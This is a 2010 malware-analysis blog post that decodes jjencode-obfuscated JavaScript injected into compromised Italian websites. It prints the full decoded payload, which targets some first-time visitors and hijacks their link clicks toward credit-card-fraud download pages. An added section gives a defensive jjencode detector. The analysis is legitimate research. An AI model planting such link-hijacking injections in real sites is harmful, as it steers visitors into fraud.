Tuesday, October 5, 2010

dollars javascript code – yet another JavaScript obfuscation method for CC frauds

January 25, 2011 – Update:
a more detailed analysis, which also references this post, is available in the "Internet Explorer exSploit Milk codes" presentation:
http://utf-8.jp/public/20101106/avtokyo.pptx


October 5, 2010:

On the MDL (Malware Domain List) forum I found a post in which a user (many thanks to Edgar) reported a strange JavaScript code injected into some Italian web sites. The message is located at the following URL:
http://www.malwaredomainlist.com/forums/index.php?topic=4354.0
The reported code looks like the following screenshot:
[screenshot: dollarscode001]

At first look it appears to be nonsense code to anyone who, like me, is not a JavaScript guru. So I decided to try to decode this very interesting code to find out what it does. The first step was to insert some JavaScript alert() calls into the prologue of the code, so the first lines were modified as follows:
[screenshot: dollarscode002]
The blue pills show where the alert() calls were placed. Executing this excerpt of code, the sequence of alert calls produced these results:
[screenshots: dollarscode003, dollarscode004, dollarscode005, dollarscode006, dollarscode007]
The rest of the deobfuscation is obtained by writing the code referenced by "Function()" into a textarea, as follows:
[screenshot: dollarscode008]
The end of the obfuscated code must also be modified, as shown:
[screenshot: dollarscode009]
Once this modified code is placed in a test HTML page and rendered by Firefox, the following deobfuscated jQuery code is obtained:
page_links = [];
// Register f as a load handler, using whichever API the browser offers
function setGlobalOnLoad(f) {
    var root = window.addEventListener || window.attachEvent ? window : document.addEventListener ? document : null;
    if (root) {
        if (root.addEventListener) root.addEventListener("load", f, false);
        else if (root.attachEvent) root.attachEvent("onload", f);
    } else {
        if (typeof window.onload == 'function') {
            var existing = window.onload;
            window.onload = function() {
                existing();
                f();
            };
        } else {
            window.onload = f;
        }
    }
}
// Cross-browser event registration (W3C addEventListener / IE attachEvent)
function addHandler(object, event, handler) {
    if (typeof object.addEventListener != 'undefined')
        object.addEventListener(event, handler, false);
    else if (typeof object.attachEvent != 'undefined')
        object.attachEvent('on' + event, handler);
}

// "right_browser": Google Toolbar ("gtb") or Chrome user agents, or a visitor
// arriving from an external referrer (for example a search engine). Note that
// the two referrer tests together are always true (an empty referrer cannot
// contain the domain), so in practice right_browser is always 'yes'.
if (window.navigator.userAgent.match(/gtb/i) || window.navigator.userAgent.match(/chrome/i) || document.referrer != '' || document.referrer.indexOf(document.domain) == -1) {
    var right_browser = 'yes';
} else var right_browser = 'no';

// Read a cookie value by name
function getCookie(c_name) {
    if (document.cookie.length > 0) {
        c_start = document.cookie.indexOf(c_name + "=");
        if (c_start != -1) {
            c_start = c_start + c_name.length + 1;
            c_end = document.cookie.indexOf(";", c_start);
            if (c_end == -1) c_end = document.cookie.length;
            return unescape(document.cookie.substring(c_start, c_end));
        }
    }
    return "";
}
// 1-in-5 chance, on the first visit only: the 'c_first' cookie is then set
// for a year so the same visitor is not targeted again
var c_index = Math.floor(Math.random() * 5);
var fcoo = getCookie('c_first');
var exdate = new Date();
exdate.setDate(exdate.getDate() + 365);
document.cookie = 'c_first' + "=" + escape('false') + ";expires=" + exdate.toUTCString();
if (c_index == 4 && fcoo != 'false' && right_browser == 'yes') {
    setGlobalOnLoad(function() {
        // Harvest the hrefs of the links inside the injected 'mlk' block
        var block = document.getElementById('mlk');
        var links = block.getElementsByTagName('A');
        for (var i = 0; i < links.length; i++) {
            page_links.push(links[i].href);
        }
        // Hijack every link on the page: on click, rewrite the clicked link's
        // href to one of the injected links chosen at random
        var links = document.links;
        for (var i = 0; i < links.length; i++) {
            addHandler(links[i], "click", function(event) {
                var index = Math.floor(Math.random() * (page_links.length - 1));
                event.target.href = page_links[index];
            });
        }
    });
} // end of the random first-visitor gate
Update: the code was obfuscated using the following encoding script:
http://utf-8.jp/public/jjencode.html (Mowab, thank you very much for your support).
At first sight the obtained code seems to be a loader for the href objects injected into the compromised web page. In particular, this line of code:
var block = document.getElementById('mlk');
is the assignment of the object that contains the links to the malicious HTML pages injected into the compromised hosts. All the servers listed in the MDL post seem to reference URLs like these:
[screenshot: dollarscode010]
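As an added example (not code from the original post, nor from jjencode itself), here is a heuristic triage check in JavaScript that flags jjencode-style "dollars code" in scripts pulled from a suspected compromised page, together with a check for the hallmarks of the decoded payload above; the ratio threshold, the sample tail and the benign snippet are my own assumptions and constructions.

```javascript
// Added example, not part of the original post or of jjencode: heuristic
// triage of scripts pulled from a suspected compromised site. It flags
// jjencode-style "dollars code" and the hallmarks of the decoded payload.

// Genuine jjencode output (default global name "$") opens by deriving the
// digits from ~[] and ++$. A custom global name would change the "$".
const JJ_PROLOGUE = /^\$=~\[\];\$=\{___:\+\+\$,\$\$\$\$:\(!\[\]\+""\)\[\$\],/;

// The whole alphabet a jjencode payload is built from: the global name,
// operators, brackets, quotes and backslash escapes. Letters or digits break it.
const JJ_ALPHABET = /^[$_~+\[\]{}():;!,=."'\\\s]*$/;

function jjencodeIndicators(script) {
  const body = script.trim();
  let marks = 0;
  for (const ch of body) if (ch === '$' || ch === '_') marks++;
  return {
    prologue: JJ_PROLOGUE.test(body),
    alphabetOnly: JJ_ALPHABET.test(body),
    markRatio: body.length ? marks / body.length : 0, // share of '$' and '_'
  };
}

function isLikelyJjencode(script) {
  const ind = jjencodeIndicators(script);
  // Assumed threshold: the alphabet test alone also passes empty or
  // punctuation-only input, so require a high share of '$' and '_' with it.
  return ind.prologue || (ind.alphabetOnly && ind.markRatio > 0.3);
}

// Hallmarks of the decoded payload in this case: links harvested from the
// injected "mlk" block and click handlers that rewrite the clicked href.
function payloadIndicators(script) {
  return {
    mlkBlock: /getElementById\(\s*['"]mlk['"]\s*\)/.test(script),
    hrefHijack: /event\.target\.href\s*=/.test(script),
  };
}

// Constructed samples: the real jjencode prologue with a made-up tail, and
// a benign snippet for comparison.
const SAMPLE_JJ = '$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$]};' +
  '$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\\"")())();';
const SAMPLE_BENIGN = 'var links = document.links; for (var i = 0; i < links.length; i++) {}';
```

The prologue regex is keyed to the default "$" global name; a sample encoded with a custom name will only be caught by the alphabet and ratio test.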
The injected HTML page leads to a site blacklisted for credit card fraud. In this case the compromised host analyzed is bisteccheriadabaffo.it. Calling, for example,
bisteccheriadabaffo.it/modules/com_easycaptcha/desert-highlands-golf-p-699.html
retrieves this page:
[screenshot: dollarscode011]
Clicking on one of the download buttons, a CAPTCHA request appears, as follows:
[screenshot: dollarscode012]
Clicking on the download button calls the following URL:
hzzzzp://turbo-speed-downloads.com/download.php?file=1506495%20Cranberry%20Highlands%20Golf%20Course%20gsm%20userschoise%2097%20302.rar

Following the download sequence, a message appears that entices the user to sign up in order to download the desired file:

[screenshot: dollarscode014]
Trying to sign up, a fake promotional message like this is shown:
[screenshot: dollarscode015]
The checkout action tries to contact this website:
hxxxxps://purchase.shopeasydeals.com/
which is blacklisted for credit card fraud, as noted by the MyWOT scorecard:
http://www.mywot.com/en/scorecard/purchase.shopeasydeals.com
[screenshot: dollarscode016]
I think that the compromised hosts, as reported at the beginning of this post, have been used in a Black Hat SEO infrastructure with the goal of enticing users to download content from a credit card fraud web site.

3 comments:

  1. Probably, that code is generated by jjencode, which I wrote.
    http://utf-8.jp/public/jjencode.html

    I feel sharp regret about the abuse of jjencode.

    --
    HASEGAWA Yosuke
    http://utf-8.jp/

  2. kudos to yosuke hasegawa

  3. mowab thank you very much for your support.